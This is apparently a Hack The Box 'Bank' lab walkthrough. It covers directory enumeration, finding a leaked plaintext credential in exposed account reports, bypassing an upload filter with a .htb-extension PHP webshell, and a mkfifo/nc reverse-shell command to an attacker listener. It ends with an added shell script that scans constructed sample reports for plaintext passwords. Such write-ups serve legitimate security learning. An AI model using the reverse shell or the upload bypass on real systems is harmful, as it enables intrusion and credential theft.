# 3 :80

```
http://ns.bank.htb/
# Apache landing page

http://bank.htb
# http://bank.htb/login.php
# Login Page

$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
2021/08/04 23:34:29 Starting gobuster in directory enumeration mode
===============================================================
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/login.php            (Status: 200) [Size: 1974]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]

http://bank.htb/balance-transfer/
# has tons of .acc files

# downloading all of them
$ wget -r http://bank.htb/balance-transfer/

# example of one file
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: czeCv3jWYYljNI2mTedDWxNCF37ddRuqrJ2WNlTLje47X7tRlHvifiVUm27AUC0ll2i9ocUIqZPo6jfs0KLf3H9qJh0ET00f3josvjaWiZkpjARjkDyokIO3ZOITPI9T
Email: 1xlwRvs9vMzOmq8H3G5npUroI9iySrrTZNpQiS0OFzD20LK4rPsRJTfs3y1VZsPYffOy7PnMo0PoLzsdpU49OkCSSDOR6DPmSEUZtiMSiCg3bJgAElKsFmlxZ9p5MfrE
Password: TmEnErfX3w0fghQUCAniWIQWRf1DutioQWMvo2srytHOKxJn76G4Ow0GM2jgvCFmzrRXtkp2N6RyDAWLGCPv9PbVRvbn7RKGjBENW3PJaHiOhezYRpt0fEV797uhZfXi
CreditCards: 5
Transactions: 93
Balance: 905948 .
===UserAccount===

# every report that encrypted correctly starts with "++OK ENCRYPT SUCCESS";
# the one that did not should still hold the plaintext fields

$ grep -L "++OK ENCRYPT SUCCESS" *.acc
68576f20e9732f1b2edc4df5b8533230.acc

$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

# these creds work on the http://bank.htb login form
http://bank.htb/index.php
# logged in as Christos Christopoulos

http://bank.htb/support.php
Form has upload file capability.
.php is not allowed; only images.

# generated a webshell embedded in an image file and uploaded it
http://bank.htb/uploads/shell.gif
The image “http://bank.htb/uploads/shell.gif” cannot be displayed because it contains errors

# the server serves the file as image data (the .gif extension is not mapped to PHP),
# so the embedded PHP is never passed to the interpreter and does not execute.

# after a lot of time spent on this, the page source turned out to contain:
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] 

# created the webshell as web.htb (the upload filter only blocks .php, and .htb is mapped to PHP)
# successfully uploaded

http://bank.htb/uploads/web.htb
# works

# command run through the web.htb webshell (attacker listener at 10.10.16.161:6969):
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.29] 56888
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/var/www/bank/uploads$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bank
www-data@bank:/var/www/bank/uploads$
```
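The `grep -L "++OK ENCRYPT SUCCESS" *.acc` step above finds the one report whose banner says encryption failed. The script below is an added example, not part of the writeup, that does the same scan with a second check: it also flags any report whose Password field is shorter than the 128-character blobs the encrypted reports on the page carry, so a file that kept the OK banner but still stored plaintext would be caught. The three `.acc` files it writes are constructed sample data (the names, e-mail addresses and passwords in them are made up), and the 128-character threshold is taken from the example report shown above.

```shell
#!/bin/sh
# Added example: locate HTB Bank ".acc" reports that were written without
# encryption. Two independent checks are applied to each file:
#   1. the first line is not the "++OK ENCRYPT SUCCESS" banner (what grep -L does), or
#   2. the Password field is shorter than the 128-character encrypted blobs.
# All sample files written by make_samples are constructed for this demo.

# Print the basename of every report in $1 that looks unencrypted.
find_plaintext_acc() {
    dir="$1"
    for f in "$dir"/*.acc; do
        [ -f "$f" ] || continue
        banner=$(head -n 1 "$f")
        pw=$(sed -n 's/^Password: //p' "$f" | head -n 1)
        # ${#pw} is 0 when the field is missing, which is also worth a look
        if [ "$banner" != "++OK ENCRYPT SUCCESS" ] || [ "${#pw}" -lt 128 ]; then
            basename "$f"
        fi
    done
}

# Print the Full Name, Email and Password values of one report, one per line.
acc_creds() {
    grep -E '^(Full Name|Email|Password): ' "$1" | sed 's/^[^:]*: //'
}

# Write three constructed reports into $1: one encrypted, one with the
# "--ERR ENCRYPT FAILED" banner, and one with the OK banner but a plaintext password.
make_samples() {
    dir="$1"
    mkdir -p "$dir"
    blob=$(printf '%0128d' 0)   # stand-in for a 128-character encrypted field
    cat > "$dir/0001.acc" <<EOF
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: $blob
Email: $blob
Password: $blob
CreditCards: 5
Transactions: 93
Balance: 905948 .
===UserAccount===
EOF
    cat > "$dir/0002.acc" <<'EOF'
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Jane Example
Email: jane@example.test
Password: NotTheRealPassword1!
CreditCards: 2
Transactions: 7
Balance: 1234 .
===UserAccount===
EOF
    cat > "$dir/0003.acc" <<'EOF'
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: John Example
Email: john@example.test
Password: Plaintext-Despite-Banner
CreditCards: 1
Transactions: 3
Balance: 42 .
===UserAccount===
EOF
}

# Stand-alone run: build the samples in a temp dir, list suspects, dump their creds.
demo_dir=$(mktemp -d)
make_samples "$demo_dir"
for f in $(find_plaintext_acc "$demo_dir"); do
    echo "== $f"
    acc_creds "$demo_dir/$f"
done
rm -rf "$demo_dir"
```

Against a real mirror of `balance-transfer/`, point `find_plaintext_acc` at the downloaded directory instead of the constructed samples; the length check is what makes it worth running even when every file carries the OK banner.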